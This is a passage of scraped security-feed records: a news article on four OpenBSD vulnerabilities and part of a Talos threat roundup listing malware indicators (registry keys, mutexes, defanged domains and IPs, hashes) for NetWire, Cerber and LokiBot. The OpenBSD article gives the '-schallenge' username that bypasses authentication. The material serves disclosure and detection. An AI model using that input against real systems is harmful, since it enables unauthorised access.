related implications, after affected vendors, including Systemd, Google, Apple, OpenVPN, WireGuard, and different Linux distros issue satisfactory workarounds and patches.\n", "modified": "2019-12-06T11:26:06", "published": "2019-12-06T11:02:00", "id": "THN:FD10C34E4C222666AC0DBB5533C900AF", "href": "https://thehackernews.com/2019/12/linux-vpn-hacking.html", "type": "thn", "title": "New Linux Bug Lets Attackers Hijack Encrypted VPN Connections", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-05T12:29:45", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-xAMVGaCr10Y/XejpIO8Pn6I/AAAAAAAA16c/unhPNzJj07EjrrxxW5YJ6-_8TZOM7xlswCLcBGAsYHQ/s728-e100/openbsd-vulnerabilities-exploit.png>)\n\nOpenBSD, an open-source operating system built with security in mind, has been found vulnerable to four new high-severity security vulnerabilities, one of which is an old-school type authentication bypass vulnerability in BSD Auth framework. \n \nThe other three vulnerabilities are privilege escalation issues that could allow local users or malicious software to gain privileges of an auth group, root, as well as of other users, respectively. \n \nThe vulnerabilities were discovered and reported by Qualys Research Labs earlier this week, in response to which OpenBSD developers released security patches for [OpenBSD 6.5](<https://www.openbsd.org/errata65.html>) and [OpenBSD 6.6](<https://www.openbsd.org/errata66.html>) just yesterday\u2014that's in less than 40 hours. \n\n\n \nHere's a brief explanation of all four security vulnerabilities in OpenBSD\u2014a free and open-source BSD-based Unix-like operating system\u2014along with their assigned CVE identifiers \n \n\n\n## OpenBSD Authentication Bypass (CVE-2019-19521)\n\n \nThe authentication bypass vulnerability resides in the way OpenBSD's authentication framework parses the username supplied by a user while logging in through smtpd, ldapd, radiusd, su, or sshd services. \n \nUsing this flaw, a remote attacker can successfully access vulnerable services with any password just by entering the username as \"-schallenge\" or \"-schallenge: passwd,\" and it works because a hyphen (-) before username tricks OpenBSD into interpreting the value as a command-line option and not as a username. \n \n\n\n[](<https://1.bp.blogspot.com/-3a_vcS24nA0/Xejx3v-dBfI/AAAAAAAA160/385L0Ra7enwKiC_o-sepWSKLhqojYWWgwCLcBGAsYHQ/s728-e100/openbsd-vulnerabilities.png>)\n\n \nHere, OpenBSD's authentication framework interprets \"-schallenge\" as \"-s challenge,\" which forces the system into silently ignoring the challenge protocol that eventually bypasses the authentication automatically. \n \n\"If an attacker specifies a username of the form '-option', they can influence the behavior of the authentication program in unexpected ways,\" the advisory said. \n \nAccording to the researchers, this vulnerability is practically exploitable in smtpd, ldapd, and radiusd, but not in sshd or su due to their defense-in-depth mechanisms that hang the connection even after successful authentication bypass. \n\n\n[](<https://bit.ly/2nAQ7y5> \"Web Application Firewall\" )\n\n \nHowever, one can still remotely exploit the flaw against sshd to determine whether an OpenBSD system is vulnerable to CVE-2019-19521 or not. \n \n\n\n## OpenBSD Local Privilege Escalation Flaws\n\n \n\n\n[](<https://1.bp.blogspot.com/-NNkUYtOsDJk/XejxdnizTaI/AAAAAAAA16o/NpxAjRBWNTk1mqjFEecfaYi0s-aKIhQZACLcBGAsYHQ/s728-e100/hacking-openbsd.png>)\n\n \nAs described above, the other OpenBSD vulnerabilities are local privilege escalation issues as briefly explained below: \n \n \n\n\n * **CVE-2019-19520: **Due to the mishandling of environment-provided paths used in dlopen(), xlock, which comes installed by default on OpenBSD, could allow local attackers to escalate privileges to 'auth' group.\n * **CVE-2019-19522:** Due to incorrect operation of authorization mechanisms via \"S/Key\" and \"YubiKey,\" which is a non-default configuration, a local attacker with 'auth' group permission can gain full privileges of the root user.\n * **CVE-2019-19519: **Due to a logical error in one of the su's primary functions, a local attacker can achieve any user's login class, often excluding root, by exploiting su's -L option.\n \n \nQualys researchers have also released [proof-of-concept exploits](<https://www.qualys.com/2019/12/04/cve-2019-19521/authentication-vulnerabilities-openbsd.txt?_ga=2.58244398.587934852.1575530822-682141427.1570559125>) for each vulnerability in its advisory. \n \nSince patches for all four security vulnerabilities are now available, affected OpenBSD users recommended to install patches using syspatch mechanism. \n\n\nHave something to say about this article? Comment below or share it with us on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter](<https://twitter.com/thehackersnews>) or our [LinkedIn Group](<https://www.linkedin.com/company/the-hacker-news/>).\n", "modified": "2019-12-05T12:02:57", "published": "2019-12-05T11:31:00", "id": "THN:46888CC4F1109D706C6033E851E731A9", "href": "https://thehackernews.com/2019/12/openbsd-authentication-vulnerability.html", "type": "thn", "title": "Severe Auth Bypass and Priv-Esc Vulnerabilities Disclosed in OpenBSD", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2019-12-06T20:48:42", "bulletinFamily": "blog", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 29 and Dec. 6. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2019/12/tru.json_.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nWin.Malware.NetWire-7428720-1 | Malware | NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Ransomware.Cerber-7419509-0 | Ransomware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although in more recent campaigns, this is no longer the case. \nWin.Trojan.LokiBot-7420275-1 | Trojan | Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents attached to spam emails. \nWin.Dropper.Gh0stRAT-7414189-0 | Dropper | Gh0stRAT is a well-known family of RATs designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks. \nWin.Trojan.Zbot-7414153-0 | Trojan | Zbot, also known as Zeus, is trojan that steals information such as banking credentials using methods like key-logging and form-grabbing. \nDoc.Downloader.Emotet-7413880-1 | Downloader | Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails. \nWin.Dropper.Tofsee-7431752-0 | Dropper | Tofsee is multi-purpose malware that features several modules that send spam messages, conduct click fraud, mine cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the overall size of the botnet under the operator\u2019s control. \nWin.Downloader.Phorpiex-7428338-0 | Downloader | Phorpiex is a trojan and worm that infects machines to deliver follow-on malware. Phorpiex has been known to drop a wide range of payloads, from malware to send spam emails to ransomware and cryptocurrency miners. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Malware.NetWire-7428720-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\NETWIRE ` | 14 \n`<HKCU>\\SOFTWARE\\NETWIRE \nValue Name: HostId ` | 14 \n`<HKCU>\\SOFTWARE\\NETWIRE \nValue Name: Install Date ` | 14 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{136PK353-UF88-3GCY-ILP2-6AY4D4SNW644} ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: HKLM ` | 13 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{136PK353-UF88-3GCY-ILP2-6AY4D4SNW644} \nValue Name: StubPath ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: MServices ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\<random guid>` | 16 \n`imDfesUY` | 13 \n`xtWSWREb` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`cobroserfinansa[.]com` | 14 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Install` | 15 \n`%TEMP%\\<random, matching '[a-z]{4,9}'>.exe` | 15 \n`%APPDATA%\\Install\\winlogon.exe` | 14 \n`%TEMP%\\7176.dmp` | 1 \n`%APPDATA%\\Install\\MServicesNet.exe` | 1 \n`%TEMP%\\7134_appcompat.txt` | 1 \n \n#### File Hashes\n\n` 038157ed389233fc4aae039df0806789f2c92b6e3947f36bc8f086ae16a7fd4e 182dadc51371a709b901f1de489a52ff7295749427a8cf9d112358a605e2ed6d 33d4c44c967c9ab53f3d04b0d11ac38f9fbc3f9d16e65cca170bd8c937589038 3cf7e6a7776e15f8c01bde5788e5e7dbbe25beb37e977abe38b3b4cb256c3ec3 527ff73f2e6d99bbcc7fa02804ab7380e2fe12689b70bb1b0840ac1b02331a93 5aa45dcf729d53a3fc6e5d02980835fe78f3f7b7ae262b8aebf2edb6abb59bc4 5f86aa7181604fadc92f1a976fdfff892cd9b515e59939d93941907a35762888 6485a616654adee2d573a983c687a8d8ea3d126dfbf86df3a065c5e7846bd57b 7746199aba6ad47bf92515db686f3a5e2accbdb2b7f480ac2af1e2c5c377a8eb 79aa89119d9e26dc366a7af72d47c323168d2ad881bca31e9075a41f5ce081f2 905b2347215e7ce0f02f8e7274941982c56c1b817fbfd4b9eaf97d2a65f6146d 91856d29ac1f9720917a40e5533c7dacf528b25acfb5a82a00f6882b053c9b5a b18a45a4345f442efcc02d6efb9110b9e35bb98fac4613c83a39fecbee78aaa4 d26438798f502364eea85bbf2804165d0709b90833ddf4512f95ac77f881edaf de8be762d85eb4014992a174acd115de70b89884d21933d7e972e6d4972904fe def9d601134017c678cbd058f41b4ad7d3dd8d2c8ef1eef01a9a17ebf38ea6fa e0acbefe824d29143e303ba8596d1436150bf1ad7ec533b56e4ae2b1bafcf07f ea34a08deaac08c7f79e6cd2e94a74ad5b0c95dec43f81e0a218d957088b8f10 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-A71_xnIISqo/XeqM2bcnfDI/AAAAAAAAC8U/10U7Bp8vnh0OPPzEdrzVimUVUDijT6k9ACLcBGAsYHQ/s1600/def9d601134017c678cbd058f41b4ad7d3dd8d2c8ef1eef01a9a17ebf38ea6fa_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-mO63cFGuGWk/XeqM6B4wP5I/AAAAAAAAC8Y/D0XOfx3jnZkD7QkmWbImdcnFLyc1XagjACLcBGAsYHQ/s1600/def9d601134017c678cbd058f41b4ad7d3dd8d2c8ef1eef01a9a17ebf38ea6fa_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.Cerber-7419509-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\BCD00000000\\OBJECTS\\{926583E4-EF64-11E4-BEED-D6738078AD98}\\ELEMENTS\\16000009 \nValue Name: Element ` | 12 \n`<HKLM>\\BCD00000000\\OBJECTS\\{926583E4-EF64-11E4-BEED-D6738078AD98}\\ELEMENTS\\250000E0 \nValue Name: Element ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: Run ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\COMMAND PROCESSOR \nValue Name: AutoRun ` | 12 \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: SCRNSAVE.EXE ` | 12 \n`<HKCU>\\PRINTERS\\DEFAULTS\\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} ` | 12 \n`<HKCU>\\PRINTERS\\DEFAULTS ` | 12 \n`<HKLM>\\BCD00000000\\OBJECTS\\{926583E4-EF64-11E4-BEED-D6738078AD98}\\ELEMENTS\\250000E0 ` | 12 \n`<HKCU>\\PRINTERS\\DEFAULTS\\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} \nValue Name: Component_01 ` | 12 \n`<HKCU>\\PRINTERS\\DEFAULTS\\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} \nValue Name: Component_00 ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: dnscacheugc ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: dnscacheugc ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: javaw ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: javaw ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: vssadmin ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: vssadmin ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: TCPSVCS ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: TCPSVCS ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: lodctr ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: lodctr ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: instnm ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: instnm ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: bootcfg ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: bootcfg ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ctfmon ` | 1 \nMutexes | Occurrences \n---|--- \n`shell.{381828AA-8B28-3374-1B67-35680555C5EF}` | 12 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`216[.]239[.]38[.]21` | 4 \n`216[.]239[.]32[.]21` | 3 \n`216[.]239[.]36[.]21` | 3 \n`216[.]239[.]34[.]21` | 2 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ipinfo[.]io` | 12 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}` | 12 \n`%System32%\\Tasks\\dnscacheugc` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\dnscacheugc.lnk` | 2 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\dnscacheugc.exe` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\bootcfg.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\bootcfg.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vssadmin.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\vssadmin.exe` | 1 \n`%System32%\\Tasks\\vssadmin` | 1 \n`%System32%\\Tasks\\bootcfg` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\ctfmon.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\ctfmon.exe` | 1 \n`%System32%\\Tasks\\ctfmon` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\resmon.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\resmon.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\newdev.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\newdev.exe` | 1 \n`%System32%\\Tasks\\mfpmp` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\mfpmp.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\mfpmp.exe` | 1 \n`%System32%\\Tasks\\javaw` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\javaw.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\javaw.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\TCPSVCS.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\TCPSVCS.EXE` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0e1509af88618c8cb273196c4213e26c2219c3a1fba9ed8c51a22d871e316ccc 1d07399e5b31727fc4dadba07d062f7eff6864e33f17fb1a65f71b9b41b61282 34a0f0bc799b5fd0cf9a89bce7d2ca2da158cf22940212b5c09fb1ec64bc9b65 4a60b63273210c8ebc4e6d07fba9b331011f852f4f5c1b5b1ae7ab5aa7df0f03 8a6c828f54dc34e260698e0347cce9e62d8fbc773e265c39c63e812201533724 8aeadd92f66576dfd9b60ba352a7a61f43da7112eb127c28c5ceb54fb5e7b4c5 b590d46794fad9c62040ce7941cf775282d1939c45267ec955e9be6ee8dd092a b8058ef9c3394ce2ea9318b06d6cf01080a0ad4ce87ee1cff78e57373192603e bbd6aadc606953b27f5592a2da7909949616b81b4f767ded89119644a71d2dd7 c8af6329fcfdfd4f9df33f2f4f59fb958e2416eebe8d78ab1444e763cf04d08c ce2b0b2037810060edbf86fc7ac78c5e0d4771b79181e39718498b02195e3642 efda569c35853456630d1e2fa27973aeb6386338f163ca0f60e3fbb4643a5b87 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Lx6S7pKbz6Q/XeqOUZ3VHqI/AAAAAAAAC8o/cyN6FoqfhAgw5jQiPi349NHl0DvQpTvrwCLcBGAsYHQ/s1600/8aeadd92f66576dfd9b60ba352a7a61f43da7112eb127c28c5ceb54fb5e7b4c5_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-KERDNEosGOE/XeqOYBMYHHI/AAAAAAAAC8s/j8nmlt4BEZs4Bg_I5zMSYeV7w9qtOb8twCLcBGAsYHQ/s1600/8aeadd92f66576dfd9b60ba352a7a61f43da7112eb127c28c5ceb54fb5e7b4c5_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.LokiBot-7420275-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS ` | 17 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\SETTINGS\\LEAKDIAGNOSISATTEMPTED ` | 12 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\QUOTATION.EXE ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\QUOTATION.EXE \nValue Name: LastDetectionTime ` | 2 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\QUOTATION ` | 2 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\QUOTATION\\OPTIONS ` | 2 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\FILENAME ` | 2 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\FILENAME\\OPTIONS ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\46646D0F2E8E990ABE331586D98FE95A61DC40D7CB2C05144A09FD8B956F7526.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\2374D2482BFECB87307D036B7E9750A0C28738C8A0AFD4ABF60A9B9EA3B81E83\\OPTIONS ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\E329CA0B2964C410BA3C5D228A13B27D733D7F9999DEE5A6511F91EA891473A9\\OPTIONS ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\02B5EF62978197B43A62D05DE25C67A67CB1B4A0F09111E79CC83688E7881674 ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\2374D2482BFECB87307D036B7E9750A0C28738C8A0AFD4ABF60A9B9EA3B81E83\\OPTIONS \nValue Name: Show Tips at Startup ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\E329CA0B2964C410BA3C5D228A13B27D733D7F9999DEE5A6511F91EA891473A9\\OPTIONS \nValue Name: Show Tips at Startup ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\02B5EF62978197B43A62D05DE25C67A67CB1B4A0F09111E79CC83688E7881674\\OPTIONS ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\02B5EF62978197B43A62D05DE25C67A67CB1B4A0F09111E79CC83688E7881674\\OPTIONS \nValue Name: Show Tips at Startup ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\938456E91538B5F4267BEDB11D8CCA26229F3DBDB3C24FF3A1132F3970C0D24A\\OPTIONS ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\938456E91538B5F4267BEDB11D8CCA26229F3DBDB3C24FF3A1132F3970C0D24A\\OPTIONS \nValue Name: Show Tips at Startup ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\02B5EF62978197B43A62D05DE25C67A67CB1B4A0F09111E79CC83688E7881674.EXE ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\E329CA0B2964C410BA3C5D228A13B27D733D7F9999DEE5A6511F91EA891473A9.EXE ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\PAYMENT ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\02B5EF62978197B43A62D05DE25C67A67CB1B4A0F09111E79CC83688E7881674.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\PAYMENT\\OPTIONS ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\E329CA0B2964C410BA3C5D228A13B27D733D7F9999DEE5A6511F91EA891473A9.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\PAYMENT\\OPTIONS \nValue Name: Show Tips at Startup ` | 1 \nMutexes | Occurrences \n---|--- \n`3749282D282E1E80C56CAE5A` | 15 \n`eDZwOHM3` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`80[.]249[.]144[.]95` | 4 \n`185[.]55[.]225[.]242` | 3 \n`107[.]175[.]150[.]73` | 3 \n`185[.]159[.]153[.]129` | 2 \n`208[.]91[.]199[.]225` | 1 \n`104[.]16[.]154[.]36` | 1 \n`142[.]11[.]234[.]232` | 1 \n`185[.]53[.]90[.]10` | 1 \n`104[.]148[.]41[.]60` | 1 \n`185[.]132[.]53[.]138` | 1 \n`167[.]172[.]184[.]185` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`iranssp[.]ir` | 2 \n`beyondlogx[.]com` | 2 \n`whatismyipaddress[.]com` | 1 \n`phoenixdevs[.]ir` | 1 \n`kontrolreport[.]com` | 1 \n`offsolo-gbb[.]tech` | 1 \n`ray-den[.]xyz` | 1 \n`avertonbullk[.]com` | 1 \n`secure-n2[.]top` | 1 \n`smtp[.]betaflexllc[.]us` | 1 \n`protestlabsmovings[.]es` | 1 \n`oscontinental[.]online` | 1 \n`porno322[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\D282E1` | 15 \n`%APPDATA%\\D282E1\\1E80C5.lck` | 15 \n`%APPDATA%\\Microsoft\\Crypto\\RSA\\S-1-5-21-2580483871-590521980-3826313501-500\\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5` | 15 \n`%HOMEPATH%\\subfolder` | 5 \n`%HOMEPATH%\\subfolder\\filename.exe` | 2 \n`%HOMEPATH%\\subfolder\\filename.vbs` | 2 \n`%HOMEPATH%\\subfolder\\quotation.exe` | 2 \n`%HOMEPATH%\\subfolder\\quotation.vbs` | 2 \n`%APPDATA%\\pid.txt` | 1 \n`%APPDATA%\\pidloc.txt` | 1 \n`%TEMP%\\holdermail.txt` | 1 \n`%TEMP%\\holderwb.txt` | 1 \n`%TEMP%\\bhvC037.tmp` | 1 \n`%HOMEPATH%\\subfolder\\payment.exe` | 1 \n`%HOMEPATH%\\subfolder\\payment.vbs` | 1 \n \n#### File Hashes\n\n` 02b5ef62978197b43a62d05de25c67a67cb1b4a0f09111e79cc83688e7881674 2374d2482bfecb87307d036b7e9750a0c28738c8a0afd4abf60a9b9ea3b81e83 2a3ad80cfac1cd63eeba8f7d8019df51df16e22ef34d2826d0aba9a56cff5c60 2eee4a29498a0d25c8d53e306c3b2414b839363992364cabbbe3fe2fd46caa9c 32f8e0daef5bb91fb0908277ad5f5d2c97398a64a8c9ff60611a103ba0d5004f 46646d0f2e8e990abe331586d98fe95a61dc40d7cb2c05144a09fd8b956f7526 4b4ba6c0f8cbadc871bcc6b3e175a569fe292973499bbf239aaaff7e75495888 548bacb5d7484fd4d4328579d18b3e62fdbf6bb7acdf6ade4ddcf6a0db61847b 7936c85dd96e641541e6e39e7a7388b8b6b16ef97569a81efceaed4abdc62ad6 938456e91538b5f4267bedb11d8cca26229f3dbdb3c24ff3a1132f3970c0d24a bb71b57a4cbf596fb6978df0e6fbdfbbbdebec8d182a62c6ecfbaa5261117aba c5bb3fd84e761402d2da77b8c0462e9f670f56d65f3ccd602cfb4326c98c4c9a c5f72bae432197bdbef019507fe69905549bbb7dcf9c455bd24e6eef008e96ea cbb00a83c374bcca6a2bf0cbfabaf1f5c655d9cb046437225bbbd04988f22811 df289130d1adda822989a8255dcd2a417ad0a8f19d753dd9ebdaf78a13e3bf7e e329ca0b2964c410ba3c5d228a13b27d733d7f9999dee5a6511f91ea891473a9 ebe841b611a116cee961119df457aaa5f8b5ada4dc6e93381d59d2bb12bdf522 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Pdsl9gU3Dj0/XeqOqccKiII/AAAAAAAAC84/gZgpXFla-MwPhue5IftO9a_cPneeGrkqQCLcBGAsYHQ/s1600/df289130d1adda822989a8255dcd2a417ad0a8f19d753dd9ebdaf78a13e3bf7e_amp.png>)\n\n \n\n\n#### 